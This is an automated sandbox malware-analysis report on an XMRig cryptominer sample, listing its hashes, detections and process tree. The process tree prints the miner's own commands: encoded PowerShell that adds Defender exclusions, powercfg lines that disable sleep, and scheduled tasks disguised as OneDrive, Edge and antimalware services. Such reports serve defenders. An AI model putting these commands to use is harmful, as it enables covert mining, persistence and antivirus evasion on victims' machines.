xmrig | e22fdca86ebf199ba600299082ac4d7e33699a346353ff96445361117193428a

Analysis

max time kernel
299s
max time network
177s
platform
windows10-1703_x64
resource
win10-20230220-en
resource tags

arch:x64arch:x86image:win10-20230220-enlocale:en-usos:windows10-1703-x64system
submitted
18/03/2023, 04:48

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

e22fdca86ebf199ba600299082ac4d7e33699a346353ff96445361117193428a.exe
Size

213KB
MD5

28df2ea6fc55b9173fd86b5267cbe5c7
SHA1

a21eaee7a80585efd952942588634f27d1d17b36
SHA256

e22fdca86ebf199ba600299082ac4d7e33699a346353ff96445361117193428a
SHA512

9aebf8b2518ab04917387d8ebfa62dbeb8c661d9ad65ac6fa2090d93495307bbf7737c9787a0d2a147fed585fc5ea86c6603d4bf47491754eb7c118d6171edbd
SSDEEP

6144:xmTrv/uwytIGNN5J83FITMr5dxAWGbbmQ6u:grv2wyDNXSoMFdxLGbbm8

Score

10^/10

xmrig miner

Malware Config

Signatures

XMRig Miner payload 17 IoCs

miner

resource	yara_rule
behavioral2/files/0x000700000001aee9-1658.dat	family_xmrig
behavioral2/files/0x000700000001aee9-1658.dat	xmrig
behavioral2/memory/2516-1660-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral2/files/0x000700000001aee9-1662.dat	family_xmrig
behavioral2/files/0x000700000001aee9-1662.dat	xmrig
behavioral2/memory/2492-1664-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral2/files/0x000700000001aee9-1666.dat	family_xmrig
behavioral2/files/0x000700000001aee9-1666.dat	xmrig
behavioral2/files/0x000700000001aee9-1665.dat	family_xmrig
behavioral2/files/0x000700000001aee9-1665.dat	xmrig
behavioral2/memory/3628-1668-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral2/files/0x000700000001aee9-1670.dat	family_xmrig
behavioral2/files/0x000700000001aee9-1670.dat	xmrig
behavioral2/memory/5044-1672-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral2/files/0x000700000001aee9-1675.dat	family_xmrig
behavioral2/files/0x000700000001aee9-1675.dat	xmrig
behavioral2/memory/4328-1677-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	AppLaunch.exe

Executes dropped EXE 7 IoCs

pid	Process
864	dllhost.exe
2516	winlogson.exe
2492	winlogson.exe
3628	winlogson.exe
5044	winlogson.exe
1912	dllhost.exe
4328	winlogson.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4308 set thread context of 2036	4308	e22fdca86ebf199ba600299082ac4d7e33699a346353ff96445361117193428a.exe	67

Program crash 1 IoCs

pid	pid_target	Process	procid_target
4548	4308	WerFault.exe	65

Creates scheduled task(s) 1 TTPs 9 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
4272	schtasks.exe
4796	schtasks.exe
1508	schtasks.exe
3664	schtasks.exe
3632	schtasks.exe
2516	schtasks.exe
1264	schtasks.exe
4240	schtasks.exe
3468	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2036	AppLaunch.exe
3000	powershell.exe
3000	powershell.exe
3000	powershell.exe
3684	powershell.exe
3684	powershell.exe
2548	powershell.exe
2548	powershell.exe
3528	powershell.exe
3528	powershell.exe
3652	powershell.exe
3652	powershell.exe
1268	powershell.exe
1268	powershell.exe
2548	powershell.exe
3528	powershell.exe
3684	powershell.exe
3652	powershell.exe
1268	powershell.exe
3684	powershell.exe
2548	powershell.exe
3528	powershell.exe
3652	powershell.exe
1268	powershell.exe
864	dllhost.exe
864	dllhost.exe
864	dllhost.exe
864	dllhost.exe
864	dllhost.exe
864	dllhost.exe
864	dllhost.exe
864	dllhost.exe
864	dllhost.exe
864	dllhost.exe
864	dllhost.exe
864	dllhost.exe
864	dllhost.exe
864	dllhost.exe
864	dllhost.exe
864	dllhost.exe
864	dllhost.exe
864	dllhost.exe
864	dllhost.exe
864	dllhost.exe
864	dllhost.exe
864	dllhost.exe
864	dllhost.exe
864	dllhost.exe
864	dllhost.exe
864	dllhost.exe
864	dllhost.exe
864	dllhost.exe
864	dllhost.exe
864	dllhost.exe
864	dllhost.exe
864	dllhost.exe
864	dllhost.exe
864	dllhost.exe
864	dllhost.exe
864	dllhost.exe
864	dllhost.exe
864	dllhost.exe
864	dllhost.exe
864	dllhost.exe

Suspicious use of AdjustPrivilegeToken 21 IoCs

description	pid	Process
Token: SeDebugPrivilege	2036	AppLaunch.exe
Token: SeDebugPrivilege	3000	powershell.exe
Token: SeShutdownPrivilege	3628	powercfg.exe
Token: SeCreatePagefilePrivilege	3628	powercfg.exe
Token: SeDebugPrivilege	3684	powershell.exe
Token: SeDebugPrivilege	2548	powershell.exe
Token: SeDebugPrivilege	3528	powershell.exe
Token: SeShutdownPrivilege	4800	powercfg.exe
Token: SeCreatePagefilePrivilege	4800	powercfg.exe
Token: SeDebugPrivilege	3652	powershell.exe
Token: SeDebugPrivilege	1268	powershell.exe
Token: SeShutdownPrivilege	5000	powercfg.exe
Token: SeCreatePagefilePrivilege	5000	powercfg.exe
Token: SeShutdownPrivilege	4940	powercfg.exe
Token: SeCreatePagefilePrivilege	4940	powercfg.exe
Token: SeDebugPrivilege	864	dllhost.exe
Token: SeShutdownPrivilege	3296	powercfg.exe
Token: SeCreatePagefilePrivilege	3296	powercfg.exe
Token: SeShutdownPrivilege	3296	powercfg.exe
Token: SeCreatePagefilePrivilege	3296	powercfg.exe
Token: SeDebugPrivilege	1912	dllhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4308 wrote to memory of 2036	4308	e22fdca86ebf199ba600299082ac4d7e33699a346353ff96445361117193428a.exe	67
PID 4308 wrote to memory of 2036	4308	e22fdca86ebf199ba600299082ac4d7e33699a346353ff96445361117193428a.exe	67
PID 4308 wrote to memory of 2036	4308	e22fdca86ebf199ba600299082ac4d7e33699a346353ff96445361117193428a.exe	67
PID 4308 wrote to memory of 2036	4308	e22fdca86ebf199ba600299082ac4d7e33699a346353ff96445361117193428a.exe	67
PID 4308 wrote to memory of 2036	4308	e22fdca86ebf199ba600299082ac4d7e33699a346353ff96445361117193428a.exe	67
PID 2036 wrote to memory of 2820	2036	AppLaunch.exe	71
PID 2036 wrote to memory of 2820	2036	AppLaunch.exe	71
PID 2036 wrote to memory of 2820	2036	AppLaunch.exe	71
PID 2820 wrote to memory of 3000	2820	cmd.exe	73
PID 2820 wrote to memory of 3000	2820	cmd.exe	73
PID 2820 wrote to memory of 3000	2820	cmd.exe	73
PID 2036 wrote to memory of 864	2036	AppLaunch.exe	74
PID 2036 wrote to memory of 864	2036	AppLaunch.exe	74
PID 2036 wrote to memory of 864	2036	AppLaunch.exe	74
PID 2036 wrote to memory of 336	2036	AppLaunch.exe	102
PID 2036 wrote to memory of 336	2036	AppLaunch.exe	102
PID 2036 wrote to memory of 336	2036	AppLaunch.exe	102
PID 2036 wrote to memory of 5112	2036	AppLaunch.exe	101
PID 2036 wrote to memory of 5112	2036	AppLaunch.exe	101
PID 2036 wrote to memory of 5112	2036	AppLaunch.exe	101
PID 2036 wrote to memory of 5092	2036	AppLaunch.exe	100
PID 2036 wrote to memory of 5092	2036	AppLaunch.exe	100
PID 2036 wrote to memory of 5092	2036	AppLaunch.exe	100
PID 2036 wrote to memory of 1996	2036	AppLaunch.exe	99
PID 2036 wrote to memory of 1996	2036	AppLaunch.exe	99
PID 2036 wrote to memory of 1996	2036	AppLaunch.exe	99
PID 2036 wrote to memory of 296	2036	AppLaunch.exe	84
PID 2036 wrote to memory of 296	2036	AppLaunch.exe	84
PID 2036 wrote to memory of 296	2036	AppLaunch.exe	84
PID 2036 wrote to memory of 32	2036	AppLaunch.exe	83
PID 2036 wrote to memory of 32	2036	AppLaunch.exe	83
PID 2036 wrote to memory of 32	2036	AppLaunch.exe	83
PID 2036 wrote to memory of 276	2036	AppLaunch.exe	82
PID 2036 wrote to memory of 276	2036	AppLaunch.exe	82
PID 2036 wrote to memory of 276	2036	AppLaunch.exe	82
PID 2036 wrote to memory of 304	2036	AppLaunch.exe	81
PID 2036 wrote to memory of 304	2036	AppLaunch.exe	81
PID 2036 wrote to memory of 304	2036	AppLaunch.exe	81
PID 2036 wrote to memory of 3452	2036	AppLaunch.exe	80
PID 2036 wrote to memory of 3452	2036	AppLaunch.exe	80
PID 2036 wrote to memory of 3452	2036	AppLaunch.exe	80
PID 2036 wrote to memory of 5088	2036	AppLaunch.exe	79
PID 2036 wrote to memory of 5088	2036	AppLaunch.exe	79
PID 2036 wrote to memory of 5088	2036	AppLaunch.exe	79
PID 2036 wrote to memory of 2648	2036	AppLaunch.exe	75
PID 2036 wrote to memory of 2648	2036	AppLaunch.exe	75
PID 2036 wrote to memory of 2648	2036	AppLaunch.exe	75
PID 2036 wrote to memory of 2480	2036	AppLaunch.exe	78
PID 2036 wrote to memory of 2480	2036	AppLaunch.exe	78
PID 2036 wrote to memory of 2480	2036	AppLaunch.exe	78
PID 2036 wrote to memory of 2320	2036	AppLaunch.exe	77
PID 2036 wrote to memory of 2320	2036	AppLaunch.exe	77
PID 2036 wrote to memory of 2320	2036	AppLaunch.exe	77
PID 2036 wrote to memory of 3236	2036	AppLaunch.exe	76
PID 2036 wrote to memory of 3236	2036	AppLaunch.exe	76
PID 2036 wrote to memory of 3236	2036	AppLaunch.exe	76
PID 2320 wrote to memory of 2548	2320	cmd.exe	105
PID 2320 wrote to memory of 2548	2320	cmd.exe	105
PID 2320 wrote to memory of 2548	2320	cmd.exe	105
PID 1996 wrote to memory of 4240	1996	cmd.exe	104
PID 1996 wrote to memory of 4240	1996	cmd.exe	104
PID 1996 wrote to memory of 4240	1996	cmd.exe	104
PID 336 wrote to memory of 1264	336	cmd.exe	103
PID 336 wrote to memory of 1264	336	cmd.exe	103

C:\Users\Admin\AppData\Local\Temp\e22fdca86ebf199ba600299082ac4d7e33699a346353ff96445361117193428a.exe
"C:\Users\Admin\AppData\Local\Temp\e22fdca86ebf199ba600299082ac4d7e33699a346353ff96445361117193428a.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4308
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
  "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
  2⤵
  - Drops file in Drivers directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2036
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C powershell -EncodedCommand "PAAjAHkANABDAEcATwBaAHoATwBHAEYAdAA0ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdgBoAFoAZQAwAFEAegByAEYARgAwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAE4AQQBKAGEAbgBMAGcAcwBoAG0ASwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBuAHMAbwAjAD4A"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2820
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -EncodedCommand "PAAjAHkANABDAEcATwBaAHoATwBHAEYAdAA0ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdgBoAFoAZQAwAFEAegByAEYARgAwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAE4AQQBKAGEAbgBMAGcAcwBoAG0ASwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBuAHMAbwAjAD4A"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3000
- - C:\ProgramData\Dllhost\dllhost.exe
    "C:\ProgramData\Dllhost\dllhost.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:864
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
      4⤵
      PID:2500
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
      4⤵
      PID:3940
    - - C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        5⤵
        
        PID:4676
    - - C:\ProgramData\Dllhost\winlogson.exe
        
        C:\ProgramData\Dllhost\winlogson.exe -c config.json
        5⤵
        Executes dropped EXE
        
        PID:2516
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
      4⤵
      PID:1056
    - - C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        5⤵
        
        PID:1112
    - - C:\ProgramData\Dllhost\winlogson.exe
        
        C:\ProgramData\Dllhost\winlogson.exe -c config.json
        5⤵
        Executes dropped EXE
        
        PID:2492
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
      4⤵
      PID:2972
    - - C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        5⤵
        
        PID:2976
    - - C:\ProgramData\Dllhost\winlogson.exe
        
        C:\ProgramData\Dllhost\winlogson.exe -c config.json
        5⤵
        Executes dropped EXE
        
        PID:3628
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
      4⤵
      PID:4752
    - - C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        5⤵
        
        PID:1264
    - - C:\ProgramData\Dllhost\winlogson.exe
        
        C:\ProgramData\Dllhost\winlogson.exe -c config.json
        5⤵
        Executes dropped EXE
        
        PID:5044
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
      4⤵
      PID:4780
    - - C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        5⤵
        
        PID:4800
    - - C:\ProgramData\Dllhost\winlogson.exe
        
        C:\ProgramData\Dllhost\winlogson.exe -c config.json
        5⤵
        Executes dropped EXE
        
        PID:4328
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C powershell -EncodedCommand "PAAjADYEWABKAEAEMQA6BGEAUAAoBDcEHgQ7BDYAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBCBCcEdwARBEsAKQRIADcAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjACEEOQQjAD4AIABAACgAIAA8ACMAOAQvBHcAZgBCBCAEMQBzAD4EIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjADEEcwA8BCYEUABmABQEPQQjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMAOgRvAEEEdQB6ABIERAROBCMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAEoEeQBTAFAAcQArBCkEagBzACYEKwRiAEMATgArBCMAPgA="
    3⤵
    PID:2648
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -EncodedCommand "PAAjADYEWABKAEAEMQA6BGEAUAAoBDcEHgQ7BDYAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBCBCcEdwARBEsAKQRIADcAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjACEEOQQjAD4AIABAACgAIAA8ACMAOAQvBHcAZgBCBCAEMQBzAD4EIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjADEEcwA8BCYEUABmABQEPQQjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMAOgRvAEEEdQB6ABIERAROBCMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAEoEeQBTAFAAcQArBCkEagBzACYEKwRiAEMATgArBCMAPgA="
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1268
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off & echo жЛze2UuzMrЛEXчМлLTТ & SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo WЕGДюiйЗДъlА4ФА
    3⤵
    PID:3236
  - - C:\Windows\SysWOW64\powercfg.exe
      powercfg /x -hibernate-timeout-ac 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3628
  - - C:\Windows\SysWOW64\powercfg.exe
      powercfg /x -hibernate-timeout-dc 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4800
  - - C:\Windows\SysWOW64\powercfg.exe
      powercfg /x -standby-timeout-ac 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:5000
  - - C:\Windows\SysWOW64\powercfg.exe
      powercfg /x -standby-timeout-dc 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4940
  - - C:\Windows\SysWOW64\powercfg.exe
      powercfg /hibernate off
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3296
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:2516
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C powershell -EncodedCommand "PAAjABkEWQB5ACkEYgAyAEUEQgBPADAAFwRrAE8EIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwB2AB8ELARTABcELwQbBEEAFwREAEoEIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjADUAcwAhBEwERQQcBEkEOQRnADMAQQR3ABcEIwA+ACAAQAAoACAAPAAjAEAETQBlAEEAZAAxBDgATgRABDIAeQBCABsEJwQjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAPQRKBBwERAB0ACIEMQBIAEsEJAQQBDUEdwBLBCMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwB4ABMEPQQhBEwASwR2ADIEegAkBFYAOAQjAD4AIAAtAEYAbwByAGMAZQAgADwAIwA6BD0EUwBnADAESwRDBBIEMQQjAD4A"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2320
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -EncodedCommand "PAAjABkEWQB5ACkEYgAyAEUEQgBPADAAFwRrAE8EIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwB2AB8ELARTABcELwQbBEEAFwREAEoEIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjADUAcwAhBEwERQQcBEkEOQRnADMAQQR3ABcEIwA+ACAAQAAoACAAPAAjAEAETQBlAEEAZAAxBDgATgRABDIAeQBCABsEJwQjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAPQRKBBwERAB0ACIEMQBIAEsEJAQQBDUEdwBLBCMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwB4ABMEPQQhBEwASwR2ADIEegAkBFYAOAQjAD4AIAAtAEYAbwByAGMAZQAgADwAIwA6BD0EUwBnADAESwRDBBIEMQQjAD4A"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2548
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C powershell -EncodedCommand "PAAjAEEAZABKADUEOAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjADcERgRDBCIENQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAIwQiBCMAPgAgAEAAKAAgADwAIwBxAHIAMQA3BCMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBrAFkAYgArBCEERwAeBHMAIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQApACAAPAAjADEATAATBCQEIAQuBCUETQBBADoEVAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwArBBcEdQBZABMETQB2AEUETAQQBCMAPgA="
    3⤵
    PID:2480
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -EncodedCommand "PAAjAEEAZABKADUEOAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjADcERgRDBCIENQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAIwQiBCMAPgAgAEAAKAAgADwAIwBxAHIAMQA3BCMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBrAFkAYgArBCEERwAeBHMAIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQApACAAPAAjADEATAATBCQEIAQuBCUETQBBADoEVAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwArBBcEdQBZABMETQB2AEUETAQQBCMAPgA="
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3684
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C powershell -EncodedCommand "PAAjAG4AEQRHBEsEHAQ4ACQENQQjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAEwARQRaABcENAQgBBIEKAQgBCMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwATBEkEHAQcBG8ANwRzAD4EIwA+ACAAQAAoACAAPAAjAHIASgBNBHQAIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjABcEUABrAEsAFgREAC4ETQAqBGMAFQRwAEoAUQAjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMAOARtAFAAdgBKBHgAIAQjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBlAEUEZAAoBCMAPgA="
    3⤵
    PID:5088
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -EncodedCommand "PAAjAG4AEQRHBEsEHAQ4ACQENQQjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAEwARQRaABcENAQgBBIEKAQgBCMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwATBEkEHAQcBG8ANwRzAD4EIwA+ACAAQAAoACAAPAAjAHIASgBNBHQAIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjABcEUABrAEsAFgREAC4ETQAqBGMAFQRwAEoAUQAjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMAOARtAFAAdgBKBHgAIAQjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBlAEUEZAAoBCMAPgA="
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3528
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C powershell -EncodedCommand "PAAjAC8EJwQjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjADMEZAApBEcATAA0BB0EbQAxAEwEeQAfBEgAMgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMALARDBCMAPgAgAEAAKAAgADwAIwA3AHMAVABKBCMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwA8BEcEdAAjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMASwQcBCMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAZQAsBCMAPgA="
    3⤵
    PID:3452
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -EncodedCommand "PAAjAC8EJwQjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjADMEZAApBEcATAA0BB0EbQAxAEwEeQAfBEgAMgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMALARDBCMAPgAgAEAAKAAgADwAIwA3AHMAVABKBCMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwA8BEcEdAAjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMASwQcBCMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAZQAsBCMAPgA="
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3652
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C echo ЕБхm6ТEnщГ5p & SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo ЭTлcцЫGrрпБcУJkkМЪO
    3⤵
    PID:304
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:4796
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C echo ЛЬкААЭkиvfOчугь & SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo oqJCгУRОПФuГпkk8U3
    3⤵
    PID:276
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:3632
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C echo ц3ИXgСIыpsркдHУ & SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo Еk
    3⤵
    PID:32
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:1508
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C echo & SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo я4РЫDH5Eк
    3⤵
    PID:296
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:3468
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C echo фsЙh9 & SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo щlэJ9fСb
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1996
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:4240
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C echo PE4UKСЯнОRвеф & SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo
    3⤵
    PID:5092
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:4272
